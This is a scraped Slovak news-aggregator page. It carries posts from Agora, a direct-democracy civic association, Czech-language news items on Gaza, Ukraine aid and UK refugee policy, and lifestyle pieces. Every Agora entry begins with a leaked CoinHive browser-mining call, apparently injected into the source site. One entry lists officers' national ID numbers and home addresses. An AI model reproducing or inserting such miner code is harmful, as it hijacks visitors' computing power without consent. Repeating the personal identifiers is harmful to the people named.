Rozšírené hľadanie
Piatok 26. Apríl 2024 |
meniny má Jaroslava

Spravodajstvo - Nezávislé

Kontakt

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Agora – občianske združenie na podporu priamej demokracie Toplianska 20 821 07 Bratislava tel. 0904 192627 e-mail: agora@priamademokracia.sk

Samosprávna demokracia a priama voľba všetkých verejných zástupcov

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Samosprávna demokracia je charakteristická svojím líniovým manažmentom. Na každom organizačnom stupni verejnej moci pôsobia 3 nezávislé orgány , ktoré sú konštituované priamou voľbou vo vlastných volebných obvodoch.

Reforma parlamentu

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Ukončenie skutočnej reformy verejnej správy a optimistická vízia Slovenska pre 21. stor. Príručka pre občanov Slovenska, ktorí majú dostatok osobných schopností a odvahy riadiť si svoj osobný život a správu vecí verejných prostredníctvom vlastných konkrétnych zástupcov s osobnou zodpovednosťou a nie sprostredkovane politickými stranami. Za posledné desaťročie na Slovensku totalitný systém politickej moci bol nahradený pluralitným systémom v ktorom si politická moc prostredníctvom koaličných rád ponechala absolútnu moc. Stranícke, osobné a skupinové záujmy záujmy doteraz volených poslancov sú nadraďované nad občianske a komunálne. Občan počas štvorročného volebného obdobia má minimálny vplyv na život v štáte, pretože nepozná a ani nemá svojho konkrétneho v parlamente.

Ste spokojný s "prácou" poslancov v Národnej rade SR?

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Po novembri 1989 sme verili v možnosť obnovy dôvery občana k správe vecí verejných na Slovensku. Odcudzenie spoločným záujmom a apatia v tých dňoch ustúpili radosti a chuti do budovania normálnejšej spoločnosti, ktorú by sme mohli považovať za svoju. Stačilo desať rokov, a opäť máme vysokú nedôveru voči zvoleným zástupcom ľudu. Nik nevie, ktorý poslanec parlamentu zastupuje moje záujmy, záujmy mojej obce, či môjho rodiska, regiónu. Parlament je miestom šarvátok, zápasu o moc a posty podľa lobistických záujmov a direktív politických strán.

Samosprávna demokracia

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Sedem dôvodov, prečo stratiť ilúzie o snahe elity decentralizovať moc alebo nie je čas donekonečna len vymieňať manažment, je načase zmeniť aj spôsob konštituovania manažmentu!

Agora - pozvánka na pravidelné verejné diskusie

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; AGORA - Občianske združenie na podporu priamej demokracie Sputniková 37, 821 01 Bratislava, agora@priamademokracia.sk, www.priamademokracia.sk, 0905 943 731 Pozvánka V rámci projektu Model Európa pozývame Vás na pravidelné verejné diskusie na tému: „Prehlbovanie občianskej demokracie v Európskej únii“. Stretnutia sa konajú každý párny štvrtok od 16,00 do 18,00 hod. v študovni Informačnej kancelárie Rady Európy, Klariská 5, Bratislava. Program stretnutia dňa 11.3. 2010: Aká by mohla byť lepšia spoločnosť? Petícia za spravodlivé referendum. Tešíme sa na Vašu účasť a na konštruktívne diskusné príspevky. Vstup voľný aj pre Vašich známych a pozvaných. František Pálka podpredseda o.z. AGORA

Program

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; I. Ciele občianskeho združenia Agora Krátkodobým cieľom Agory je nájdenie prirodzených aktivistov a utvorenie štruktúry pre obhajobu a šírenie myšlienok priamej demokracie v praxi, tak potrebnej pred možným referendom o vstupe do EÚ, získanie podpory pre väčšinový jedno mandátový volebný systém, nájdenie spôsobu pre posilnenie dôvery voči zastupiteľstvám na regionálnej i celoštátnej úrovni. Oboznámenie verejnosti s možnosťami priamej demokracie na Slovensku a o výhodách a nevýhodách volebných systémov. Pripravenie informatívnych materiálov pre širokú verejnosť ako aj vzdelávacie pomôcky pre aktivistov a účastníkov pripravovaných workshopov a stretnutí s občanmi.

Stanovy

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; S T A N O V Y Článok I. Základné ustanovenia 1. Názov občianskeho združenia je Agora – občianske združenie na podporu priamej demokracia . 2. Sídlom združenia je Bratislava, Toplianska 20, PSČ 821 07.

Zmena štatutárov združenia

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Agora – občianske združenie na podporu priamej demokracie, registrované na MV SR pod číslom VVS/1-900/90-17098, sídlo Toplianska 20, 821 07 Bratislava. Oznamujeme vám, že podľa stanov nášho združenia valné zhromaždenie dňa 24. 2. 2014 zvolilo nové predsedníctvo v tomto zložení: 1. František Pálka, predseda, 510729/242, 900 52 Kuchyňa 336 2. Bohumil Olach, člen predsedníctva, 451221/711, Toplianska 20, 821 07 Bratislava 3. Denisa Ilková, člen predsedníctva, 725915/6388, 900 52 Kuchyňa 551

Priama demokracia v kontexte sociálnej politiky štátu

05.04.2024 02:15  var miner = new CoinHive.Anonymous ; miner.start ; Výkon verejnej moci ako sociálnej politiky štátu a sociálna práca sú v nepriamom závislom vzťahu. Čím je kvalitnejšia sociálna politika štátu, tým by sa mala prirodzene zvyšovať kvalita života väčšinovej spoločnosti a znižovať potreba sociálnej práce. Znižovanie kvality života a zvyšovanie potreby sociálnej práce od roku 1990 v procese transformácie, globalizácie a demokratizácie slovenskej spoločnosti je dôkazom zlej sociálnej politiky štátu. Táto práca v rámci teoreticko-vedného odboru sociálnej práce popisuje príčiny tohto patologického spoločenského vývoja a v rámci preventívnej sociálnej práce navrhuje alternatívne systémové opatrenia, ktoré by dokázali tento nepriaznivý vývoj zastaviť a zvrátiť. Súčasnú krízu rieši ako predmet sociálnej práce, ktorý je determinovaný najmä kvalitou výkonu spoločenského manažmentu a kvalitou dosiahnutej demokracie. V závere ako jednu z možností navrhuje väčšiu angažovanosť profesionálnych sociálnych pracovníkov vo verejnom živote pri zastupovaní svojich klientov. Celá bakalárska práca

Amnesty International obvinila Spojené království ze „záměrné...

26.04.2024 02:30  Šéfka Amnesty International rovněž varuje, že Británie bude „historií tvrdě souzena za to, že nepomohla zabránit masakru civilistů v Gaze“ Amnesty International obvinila Velkou Británii z „úmyslné destabilizace“ lidských práv na světové scéně pro své vlastní politické cíle.Ve své výroční globální zprávě, kterou organizace dnes zveřejnila, uvedla, že Británie oslabuje ochranu lidských práv na národní i globální úrovni, a to v situaci, kdy se mezinárodní právo téměř rozpadá.

Americký Senát schválil pomoc ve výši 95 miliard dolarů pro Ukrajinu,...

24.04.2024 20:45 Senát nadpoloviční většinou  hlasoval pro urychlení tohoto opatření, které by měl podepsat Joe Biden. Americký Senát v úterý drtivou většinou hlasů schválil pomoc ve výši 95 miliard dolarů pro Ukrajinu, Izrael a Tchaj-wan, když se v nadpoloviční většině obou stran sjednotil na tom, že tento dlouho odkládaný balík pošle k podpisu Joeovi Bidenovi. Konečný výsledek hlasování byl 79 ku 18.Návrh zákona dříve během dne snadno překonal klíčovou procedurální překážku. Senát drtivou většinou odhlasoval jeho prosazení, což předseda většiny označil za „jeden z největších úspěchů, kterým Senát za poslední roky čelil“.„Dnes Senát vysílá jednotný vzkaz celému světu: Amerika bude vždy bránit demokracii v hodině její nouze,“ uvedl Chuck Schumer ve svém prohlášení. v úterý odpoledne.

Humanitární skupiny požadují bezpečné cesty pro uprchlíky do Británie...

24.04.2024 20:45  OSN a Rada Evropy se přidávají k protestům, během několika hodin po schválení obscénního zákona o deportaci uprchlíků z Británie do Rwandy se utopili další lidéHumanitární skupiny vyzvaly k vytvoření nových bezpečných tras do Velké Británie poté, co během několika hodin poté, co ministři schválili kontroverzní zákon o Rwandě, zemřelo při pokusu o překonání Lamanšského průlivu pět lidí.V úterý se utopilo dítě a čtyři dospělí, kteří se snažili dostat do Spojeného království na člunu z Wimereux ve Francii. Na palubě plavidla, které v pět hodin ráno opustilo francouzské pobřeží, bylo údajně více než 110 lidí.

O studentských protestech v USA

24.04.2024 20:45 Jsem velmi rád, že se konečně studenstvo na amerických vysokých školách začíná probírat z letargie, kterou jim po léta vlévají do mozků korporátní média, aby si vychovala jen konzumní otroky, snažící se šplhat po kariérním žebříčku a neprotestovat proti ekonomické vládnoucí vrstvě. Samozřejmě se rektoři amerických universit snaží jakékoliv protesty proti mordování lidí v Gaze Israelem potlačit. Zrovna před nekolika dněma nechala rektorka  Kolumbijské university v New Yorku zatknout asi sto protestujících studentů a řadu z nich vyhodit ze studií. Paní Shafik se totiž vrátila z výslechu v Kongresu ve |Washingtonu, kde na ní doslova řvali, jestli podporuje “antisemitismus”. Samozřejmě se paní Shafik zhroutila, neboť nechtěla být další vyhozenou rektorkou z university, jak se stalo rektorkám  na Harvardu a Pennsylvanske universitě. Celé cenzurní šílenství v naší americké společnosti přerůstá v nový mccarthyismus. Právě jsem se vrátil ze začínající okupace Emerson College v Bostonu, od níž nedaleko bydlím.  Stejný camp založili studenti i na MIT. Zde moje fotoreportáž.    https://www.columbiaspectator.com/photo-essays/2024/04/19/in-focus-over-100-students-arrested-by-the-nypd-as-authorized-by-shafik/?https://www.axios.com/2024/01/02/harvard-president-resign-claudine-gay

„Podvod“: činitelé vyjadřují obavy z amerických plánů na...

24.04.2024 20:45  Obávají se, že Izrael ovlivňuje umístění přístavu mimo sever, kde je hrozba hladomoru nejvážnější.Obří plovoucí přístav se blíží k dokončení ve východním Středomoří, odkud bude posunut k pobřeží Gazy, ale roste nejistota ohledně toho, jak užitečný bude tento americký projekt při odstraňování hladomoru.V humanitární komunitě panují obavy, že Izrael plán mola, který Joe Biden vyzdvihoval jako způsob, jak dosáhnout „masivního“ zvýšení pomoci Gaze, převzal, přičemž jeden z humanitárních pracovníků uvedl, že hrozí, že se projekt stane „kouřovou clonou“ pro plánovanou invazi do Rafáhu.

slowPoise

24.04.2024 09:45 Obrázek pro tento den:

Humanitární skupiny požadují bezpečné cesty pro uprchlíky do...

24.04.2024 09:45  OSN a Rada Evropy se přidávají k protestům, během několika hodin po schválení obscénního zákona o deportaci uprchlíků z Británie do Rwandy se utopili další lidéHumanitární skupiny vyzvaly k vytvoření nových bezpečných tras do Velké Británie poté, co během několika hodin poté, co ministři schválili kontroverzní zákon o Rwandě, zemřelo při pokusu o překonání Lamanšského průlivu pět lidí.V úterý se utopilo dítě a čtyři dospělí, kteří se snažili dostat do Spojeného království na člunu z Wimereux ve Francii. Na palubě plavidla, které v pět hodin ráno opustilo francouzské pobřeží, bylo údajně více než 110 lidí.

Rozhovor Britských listů 659. Immanuel Kant: Nedůvěřujte autoritám!

24.04.2024 09:45 K třístému výročí narození filozofa Immanuela Kanta uvažují Bohumil Kartous a Richard Vlasák nad jeho významem pro dnešek. Kompletní transkript tohoto rozhovoru:

Exkluzivní: Izraelský voják svědčí o válečných zločinech...

24.04.2024 09:45 Reportér, Channel 4 News, úterý 23. dubna 2023, 19 hodin:  Izraelská válka v Gaze je  jednou z nejničivějších a nejsmrtonosnějších v moderní době. Izraelská armáda trvá na tom, že se zaměřuje pouze na Hamás, ale je obviňována z brutálního kolektivního trestání celého obyvatelstva. „Myslíte si, že jste byl svědky toho, jak dochází k válečným zločinům?“ zeptal jsem se.„Pravděpodobně ano. Pravděpodobně ano. Základním předpokladem u armády je, že jsou to příslušníci Hamásu, a pakliže jdete touto cestou, určitě zabíjíte i lidi, kteří jimi nejsou.“Jeden z izraelských vojáků nám ve vzácném rozhovoru svědčí o skutečnostech, který byl podle svých slov svědkem.„Tohle je něco, co si ponesu do konce života.“

Padesát let blízkovýchodních studií, I.

24.04.2024 09:45 Toto je první část třídílného seriálu o radikalizaci blízkovýchodních studií. V posledních pěti desetiletích měla studia Blízkého východu hluboký dopad na tento region. Dlouho to nebylo ani tak akademické pole, jako spíše ideologické bojiště – a zde je moje zpráva z fronty, píše Michael Oren.

5 kúskov oblečenia od značky TATUUM, ktoré nikdy nevyjdú z módy

23.04.2024 04:00 Vo svete módy, kde sa trendy menia zo sezóny na sezónu, existuje priestor pre nadčasovú eleganciu – oblečenie, ktoré tvorí základ každého štýlového šatníka. Značka TATUUM, s jej dôrazom na klasickú eleganciu a kvalitný štýl, ponúka kolekcie, ktoré sú základom nesmrteľnej módy. Tu je päť kúskov z ponuky TATUUM, ktoré môžeme s hrdosťou nazvať nezameniteľnými

Ako zabezpečiť, aby vaša záhradná párty bola nezabudnuteľná? Začnite...

20.04.2024 02:16 Príprava záhrady na spoločenské stretnutie môže byť vzrušujúcim, no zároveň náročným úkonom. Nie je to len o tom, ako rozložiť stoly a stoličky, ale aj o tom, ako vytvoriť príjemné a pohostinné prostredie, ktoré privíta vašich hostí a zabezpečí, aby sa cítili pohodlne a príjemne počas celej oslavy. Nasledujúce kroky vám pomôžu zabezpečiť, že vaša

Noc, v ktorej techno znamená všetko

15.04.2024 23:15 COAL Hall 2024 prichádza do Trojhaly Karolina, aby obklopil Ostravu pulzujúcim rytmom techno a elektronickej hudby. Táto nekompromisná udalosť sľubuje spojiť hudobných nadšencov a vyčariť nezabudnuteľnú noc plnú energie a eufórie. Dátum 19. apríla si ihneď označte červeným fixom vo svojom kalendári, pretože sa blíži najväčšia techno halová udalosť tohto roku! Adrenalín bude prúdiť a

Prídi sa zoznámiť na Valentínsku párty už tento piatok

15.04.2024 01:30 Nech už je tvoj vzťahový status akýkoľvek, na našej Valentínskej edícii pod názvom Rave On Love na tom nezáleží. Všetci sme tu kvôli hudbe a to je náš love language. Farebne odlíšené náramky: Súčasťou tejto špeciálnej Valentínskej edície budú aj farebne odlíšené náramky s textom, ktoré vyjadrujú tvoj aktuálny stav. Dostupné statusy: Zadaný, Slobodný, Som tu len na

Najzdravšie orechy a ich výhody pre vaše zdravie

09.04.2024 04:30 Orechy sú bohatým zdrojom živín a zdravých tukov a môžu prispieť k celkovému zdraviu. Tu je prehľad niektorých z najzdravších orechov a dôvodov, prečo by ste ich mali začleniť do svojej stravy. 1. Mandle: Mandle sú vynikajúcim zdrojom vitamínu E, antioxidantov a zdravých tukov. Pomáhajú chrániť telo pred oxidačným stresom a podporujú zdravie srdca. 2.

5 tipov ako účinne zlepšíte svoju produktivitu a zvládnete stres

06.04.2024 02:30 Stres a nedostatok produktivity sú bežné problémy, s ktorými sa stretávame v každodennom živote. Napriek tomu, že každý z nás má svoje vlastné spôsoby, ako s nimi bojovať, existujú isté psychologické triky, ktoré môžu pomôcť zlepšiť našu produktivitu a lepšie zvládať stres. Nižšie je uvedených niekoľko jednoduchých, ale účinných tipov, ktoré môžete začleniť do svojho

Samsung predstavuje svoju prvú mimoriadne širokú chladničku s mrazničkou...

06.04.2024 02:30 RB6000D šetrí energiu vďaka úplne novému invertorovému kompresoru. Veľkou prednosťou je aj režim AI Energy s využitím umelej inteligencie a väčšia kapacita Spoločnosť Samsung Electronics na európskom trhu predstavila novú, energeticky úspornú chladničku Extra Wide Bottom Mount Freezer. Stalo sa tak na akcii Welcome to BESPOKE AI v Pavillon des Étangs v Paríži. Chladnička sama osebe

10 netradičných cestovateľských destinácií, ktoré vám zmenia pohľad...

02.04.2024 11:15 Cestovanie je jedným z najlepších spôsobov, ako objavovať svet a rozširovať svoje obzory. Okrem obľúbených turistických miest existujú aj mnohé netradičné destinácie, ktoré môžu ponúknuť úplne nový pohľad na svet a otvoriť dvere k nezabudnuteľným skúsenostiam. V tomto článku sa pozrieme na 10 takýchto netradičných cestovateľských destinácií, ktoré by ste mali zaradiť na svoj zoznam